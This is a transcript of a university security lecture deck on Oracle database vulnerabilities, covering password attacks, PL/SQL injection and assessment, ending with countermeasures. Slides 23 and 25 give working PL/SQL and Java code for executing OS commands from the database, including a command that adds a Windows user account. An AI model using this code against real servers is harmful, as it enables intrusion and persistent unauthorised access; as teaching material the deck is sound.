Presentation is loading. Please wait.

Presentation is loading. Please wait.

Information System Security. Outline  Oracle Vulnerabilities  Oracle Security Assessment 2 Information System Security - Week 10.

Published byMalcolm Gilbert Modified over 9 years ago

Similar presentations

Presentation on theme: "Information System Security. Outline  Oracle Vulnerabilities  Oracle Security Assessment 2 Information System Security - Week 10."— Presentation transcript:

1 Information System Security

2 Outline  Oracle Vulnerabilities  Oracle Security Assessment 2 Information System Security - Week 10

3 Outline  Oracle Vulnerabilities  Oracle Security Assessment 3 Information System Security - Week 10

4 Ways to attack 4 Information System Security - Week 10

5 Outline  Oracle Vulnerabilities Users/Passwords PL/SQL injection Running System Commands Other Vulnerabilities 5 Information System Security - Week 10

6 Users/Passwords  TNS protocol  How Oracle authenticates users?  Vulnerabilities 6 Information System Security - Week 10

7 TNS protocol Information System Security - Week 10 7

8 TNS protocol (cont) Information System Security - Week 10 8  TNS Listener is the hub of all communications in Oracle.  Information gathering can be done through TNS. ClientListener Connect Accept or Redirect

9 TNS protocol (cont) Information System Security - Week 10 9

10 Authentication process Information System Security - Week 10 10 Send Username Send AUTH_SESSKEY Decrypts AUTH_SESSKEY Encrypts Password Generates Secret Number Send AUTH_PASSWORD Compares with the password hash from database. Authenticated ClientServer

11 How about Oracle 11g Information System Security - Week 10 11 Send Username Send AUTH_SESSKEY and AUTH_VFR_DATA Decrypts AUTH_SESSKEY Generates own AUTH_SESSKEY Combines 2 AUTH_SESSKEY  Encrypt Password Generates Secret Number Send AUTH_PASSWORD Compares with the password hash from database. Authenticated ClientServer

12 Vulnerabilities  Crypto Aspect If we have the password (hash)  get clear text password Information System Security - Week 10 12

13 Vulnerabilities (cont)  Default Usernames/Passwords.  Files for passwords.  Brute-force. Information System Security - Week 10 13

14 PL/SQL Injection  Introduction  Procedures, functions  Triggers  VPD 14 Information System Security - Week 10

15 Introduction  PL/SQL is the programming language built into Oracle extends SQL.  Can call external library (C or Java).  Used to create procedures, functions, triggers… Information System Security - Week 10 15

16 Introduction (cont)  Execution privileges. Definer privileges: “owner” rights. Invoker privileges: Keyword: AUTHID CURRENT_USER  PL/SQL can be wrapped  working without source: DESCribe feature. Information System Security - Week 10 16

17 Procedures  Similar to SQL injection.  PL/SQL injection can occur with a statement like this: Information System Security - Week 10 17 Select * from table_name where id=‘USER_INPUT’ Select * from table_name where id=‘XXX’ UNION SELECT ….

18 Procedures (cont)  Inject function to PL/SQL statement. Keyword: AUTONOMOUS_TRANSACTION  Take advantage of what right functions/procedures are based on. Information System Security - Week 10 18

19 Triggers  Similar to procedures/functions injection.  Note: Triggers run with definer right.  Some real-world examples: MDSYS.SDO_DROP_USER_BEFORE MDSYS.SDO_GEOM_TRIG_INS1 Information System Security - Week 10 19

20 VPD  VPD is based on policy function.  Can be exploited through PL/SQL injection to drop policy.  Or exploited to grant EXEMPT ACCESS POLICY privilege  Another way to defeat VPD is reading raw file  HARD Information System Security - Week 10 20

21 Running System Commands  Through PL/SQL  Through Java  Access File System  Access Network 21 Information System Security - Week 10

22 Through PL/SQL  Use msvcrt.dll library to exec system command.  Must have create library privilege to register library in oracle  Newer versions of Oracle only accept libraries in Oracle_home/bin Information System Security - Week 10 22

23 Through PL/SQL (cont)  CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll';  CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)  IS EXTERNAL  NAME "system"  LIBRARY exec_shell  LANGUAGE C;  EXEC ORAEXEC('NET USER MYACCOUNT PASSWORD /ADD'); Information System Security - Week 10 23

24 Through Java  Don’t need create library privilege.  Require: Execute on all files. Write File Descriptor. Read File Descriptor. Information System Security - Week 10 24

25 Through Java (cont)  CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS  import java.lang.*;  import java.io.*;   public class JAVACMD  {  public static void execCommand (String command) throws IOException  {  Runtime.getRuntime().exec(command);  }  }; Information System Security - Week 10 25

26 Other ways  Using DBMS Scheduler.  Using Job Scheduler.  Using Alter System statement. Information System Security - Week 10 26

27 Access File System  Use UTL_FILE library  Need to have privilege to access DIRECTORY object or create a new one.  Using Java: is similar to running OS command. Need Read and Write permission Information System Security - Week 10 27

28 Access Network  Use UTL_TCP or UTL_HTTP.  Create connection to a remote host  transfer data. Information System Security - Week 10 28

29 Other Vulnerabilities  System Configurations O7_DICTIONARY_ACCESSIBILITY remote_os_authent dblink_encrypt_login..  TNS protocol settings  Application vulnerabilities Information System Security - Week 10 29

30 Other Vulnerabilities  Session attack http://www.youtube.com/watch?v=jjRrL JEbDQU http://www.youtube.com/watch?v=jjRrL JEbDQU  Access Control bypass in Login http://www.securityfocus.com/archive/ 1/422253 http://www.securityfocus.com/archive/ 1/422253 Information System Security - Week 10 30

31 Outline  Oracle Vulnerabilities  Oracle Security Assessment 31 Information System Security - Week 10

32 Oracle Assessment  Vulnerability scanning  Penetration testing Information System Security - Week 10 32

33 Vulnerability scanning  Look for evidence of Vulnerable software versions Presence or lack of patches Misconfiguration Information System Security - Week 10 33

34 Vulnerability assessment tool  Secure Oracle Auditor™ (SOA) Information System Security - Week 10 34

35 Penetration test  A penetration test (pentest) is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source.securitycomputer systemnetwork Information System Security - Week 10 35

36 Penetration test o Stages: o Scope/Goal Definition o Information Gathering o Vulnerability Detection o Information Analysis and Planning. o Attack& Penetration/Privilege Escalation. o Result Analysis & Reporting. o Cleanup. Information System Security - Week 10 36

37  Footprint The first and most convenient way that hackers use to gather information. Includes: internet, remote access,extranet… Example: whois hvaonline.net Information System Security - Week 10 37 Information gathering

38 Information System Security - Week 10 38  Example:

39 Attack  SQL script Information System Security - Week 10 39

40 Vulnerability assessment tool  AppDetectivePro for Oracle  Metasploit Information System Security - Week 10 40

41 DATABASE SERVICES COUNTERMEASURES  Remove default accounts, assign strong passwords to existing accounts, and begin the audit facility for failed logins.  Keep the databases patched  Reducing the privileges such as PUBLIC, keeping the privileges to a minimum, and auditing access to critical tables and views. Information System Security - Week 10 41

42 Summary  Vulnerabilities usually occur based on granting inappropriate privileges. CREATE ANY PROCEDURE CREATE ANY TRIGGER CREATE ANY VIEW GRANT Something to PUBLIC … Information System Security - Week 10 42

43 References  Oracle Hacker’s HandBook  Database Hacker’s HandBook  http://www.petefinnigan.com/weblog/ http://www.petefinnigan.com/weblog/  http://soonerorlater.hu/index.khtml?ar ticle_id=512 http://soonerorlater.hu/index.khtml?ar ticle_id=512 Information System Security - Week 10 43

44 Information System Security - Week 10 44

Download ppt "Information System Security. Outline  Oracle Vulnerabilities  Oracle Security Assessment 2 Information System Security - Week 10."

Similar presentations

10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden.

10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
Understand Database Security Concepts

Understand Database Security Concepts
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
Some general principles in computer security Tomasz Bilski Chair of Control, Robotics and Computer Science Poznań University.

Some general principles in computer security Tomasz Bilski Chair of Control, Robotics and Computer Science Poznań University.
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
Penetration Testing Anand Sudula, CISA,CISSP SSA Global Technologies, India Anand Sudula, CISA,CISSP SSA Global Technologies, India.

Penetration Testing Anand Sudula, CISA,CISSP SSA Global Technologies, India Anand Sudula, CISA,CISSP SSA Global Technologies, India.
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 5 Database Application Security Models.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 5 Database Application Security Models.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.

CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 9 Performing Vulnerability Assessments.

Security+ Guide to Network Security Fundamentals, Third Edition Chapter 9 Performing Vulnerability Assessments.
System Administration Accounts privileges, users and roles

System Administration Accounts privileges, users and roles
SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 2 Operating System Security Fundamentals.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 2 Operating System Security Fundamentals.
Chapter 5 Database Application Security Models

Chapter 5 Database Application Security Models
Security in SQL Jon Holmes CIS 407 Fall 2007. Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.
1 GFI LANguard Network Security Scanner. 2 Contents Introduction Features Source & Installation Testing environment Results Conclusion.

1 GFI LANguard Network Security Scanner. 2 Contents Introduction Features Source & Installation Testing environment Results Conclusion.
Hacking Web Server Defiana Arnaldy, M.Si 0818 0296 4763.

Hacking Web Server Defiana Arnaldy, M.Si
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.
Directory and File Transfer Services Chapter 7. Learning Objectives Explain benefits offered by centralized enterprise directory services such as LDAP.

Directory and File Transfer Services Chapter 7. Learning Objectives Explain benefits offered by centralized enterprise directory services such as LDAP.

Similar presentations

Ads by Google